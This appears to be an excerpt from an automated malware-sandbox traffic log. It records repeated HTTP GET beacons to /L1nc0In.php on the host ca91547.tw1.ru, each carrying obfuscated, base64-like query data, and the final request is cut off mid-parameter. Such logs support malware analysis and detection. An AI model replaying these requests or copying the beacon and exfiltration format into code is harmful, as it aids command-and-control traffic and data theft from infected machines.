Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtR